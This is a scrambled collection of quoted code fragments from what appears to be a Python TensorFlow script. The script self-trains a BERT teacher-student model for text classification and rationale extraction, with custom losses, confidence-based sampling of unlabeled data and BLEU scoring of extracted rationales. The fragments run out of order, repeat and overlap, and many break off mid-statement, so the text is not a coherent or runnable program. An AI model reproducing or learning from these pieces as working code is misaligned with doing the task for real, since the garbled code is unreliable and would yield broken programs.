'mtl' in type_: acc, y_pred", "y_train acc, y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val = acc y_rat =", "axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint'", "model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1", "np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample,", "logging import math import models import numpy as np import os, sys import", "1: #to skip evaluation of the task label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+=", "if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] =", "\"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for i in range(len(y_pred))]) acc = acc[:,None]", "elif 'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0],", "acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None] y_batch = np.concatenate((acc, y_pred),", "shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight)", "= deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc", "loss_weights = [1.0, 0.0] else: loss_weights = [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if", "for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1:", "0.0 for i in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2", "= {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch =", "1.0, 1.0, 1.0] ''' if '_noexp' in type_: loss_weights = [1.0, 0, 0,", "batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1)", "= dict() temp['text'] = text temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] =", "loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights)", "= np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1,", "y_pred, r_acc = out[0], out[1], out[2] #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred,", "= list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale =", "if 'mtl' in type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs,", "X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens that are not", "sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss = None if 'focal' in type_: rat_loss", "= np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev,", "warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch + 1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return", "#y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten()", "nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f) logger.info (\"Best accuracy", "score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0,", "is adapted from UST (https://github.com/microsoft/UST) \"\"\" from collections import defaultdict from sklearn.utils import", "= acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None] y_batch = np.concatenate((acc,", "logger.info (\"Starting loop {}\".format(epoch)) if type_ == 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]],", "os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded from {}\".format(model_file)) continue", "class_weight=class_weight) elif 'joint_neg' in type_: logger.info(\"Training for without rationales\") with strategy.scope(): def custom_loss(y_true,", "to {}\".format(model_file)) model_student = model model_student.load_weights(model_file_best) if 'mtl' in type_: acc, y_pred =", "if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to skip evaluation of", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc = out[3], out[4],", "if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc", "X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in type_: acc = acc[:,None] y_batch", "on test set (teacher model): {} \".format(score4/len(pred))) best_loss = np.inf data = []", "loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif", "= dict() temp['text'] = ' '.join(text) temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score']", "return cce_loss + 0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)", "[1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None},", "{\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev =", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss =", "y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if", "y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:],", "temp = dict() temp['text'] = text temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score']", "= None # model_task for epoch in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if", "average='micro'))) elif 'joint' in type_: out = model_student.predict(X_test) acc, y_pred, r_acc = out[0],", "logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance for token (macro/task):", "[y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc", "validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ ==", "unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels", "acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in", "np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask =", "(\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl' in type_: #model = model_student logger.info(y_batch.shape)", "1/len(labels))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] elif 'joint' in type_: out", "sample from unlabeled set if 'uni' in sample_scheme: logger.info (\"Sampling uniformly\") if unsup_size", "r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val = acc y_rat = np.array(y_pred).astype('float') #y_rat =", "y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape))", "X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:],", "strategy = tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run the base", "y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating confidence", "y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc >", "'fine_tune_teacher' in type_: rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2)", "else: loss_weights = [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")])", "best_base_model = model logger.info (\"Model file loaded from {}\".format(model_file)) break elif 'mtl' in", "type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg =", "\"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size],", "model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)),", "SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if", "X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:],", "f: json.dump(data, f) model_student = None # model_task for epoch in range(unsup_epochs): logger.info", "if epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch + 1) else: res", "range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 +=", "y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]),", "sklearn.metrics import f1_score from sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7,", "y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in type_: logger.info(\"Training", "[y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif 'joint' in type_: temp = model.evaluate(X_test, [y_test[:,0],", "X and y to train and dev with valid_split if valid_split > 0:", "= models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "= tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss + 0.01*coh_loss", "= tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run the base model", "max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt' in type_: #re-weight", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'],", "y_rat[:,1:] #y_pred = y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc =", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val", "import defaultdict from sklearn.utils import shuffle from transformers import * import logging import", "patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in type_: rat_loss = None if 'focal'", "the unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {} number", "reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal' in type_: rat_loss =", "np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling at the moment; choose all the unlabeled examples\")", "sample {}\".format(temp)) for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1]", "loss_weights = [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #,", "np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file):", "model model_student.load_weights(model_file_best) if 'mtl' in type_: acc, y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred,", "#y_pred = y_pred[:,1:] # sample from unlabeled set if 'uni' in sample_scheme: logger.info", "truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word in temp_p:", "== 'joint': # or 'joint_neg' in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "test set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set", "valid_split > 0: train_size = int((1. - valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train,", "logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test acc (task) {}\".format(test_task_acc)) if test_task_acc >=", "temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if", "+ 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss", "X_negation_sample['attention_mask'][indices]} elif 'joint' in type_: acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]),", "Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape:", "y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev,", "= [] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales", "r_acc = out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred,", "+ 1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return", "= tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = text temp['truth'] = truth[i] temp['pred'] =", "model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2]", "best_base_model = None best_validation_loss = np.inf for counter in range(N_base): #original N_base=10 with", "custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None,", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0],", "{} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (teacher model): {} \".format(score2/len(pred)))", "y_test[:,0], y_neg_test], verbose=0) elif 'joint' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0],", "{'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred", "logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)],", "np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: if 'pruthi_'", "alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None,", "verbose=0)[-3] if '_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test),", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif 'joint' in type_: temp =", "{}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync", "#logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl' in type_: #model = model_student", "{}\".format(temp)) for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] ==", "if 'mtl' in type_: logger.info (\"Best validation acc for base model {}: {}\".format(best_validation_loss,", "learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled,", "'joint_neg' in type_: logger.info(\"Training for without rationales\") with strategy.scope(): def custom_loss(y_true, y_pred): cce", "= model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc = out[3], out[4], out[5]", "X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\":", "X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None]", "type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint,", "token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth = [], [] #sys.exit(1) test_pred", "1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales", "X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc", "joint {}\".format(temp)) logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info", "continue if 'mtl' in type_ : acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val =", "type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]},", "'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier':", "X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf", "0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0,", "y, X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased',", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test) acc1, y_pred1, r_acc1", "y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1)", "metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter == 0: logger.info(model.summary()) model_file =", "{}\".format(model_file)) best_val_acc = 0. best_test_acc = 0. max_test_acc = 0. max_task_acc = 0.", "''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "= np.argmax(class_acc, axis=-1) elif 'joint' in type_: out = model.predict(X_test) class_acc, test_pred, r_acc", "max_seq_length, len(labels), dense_dropout=dense_dropout, 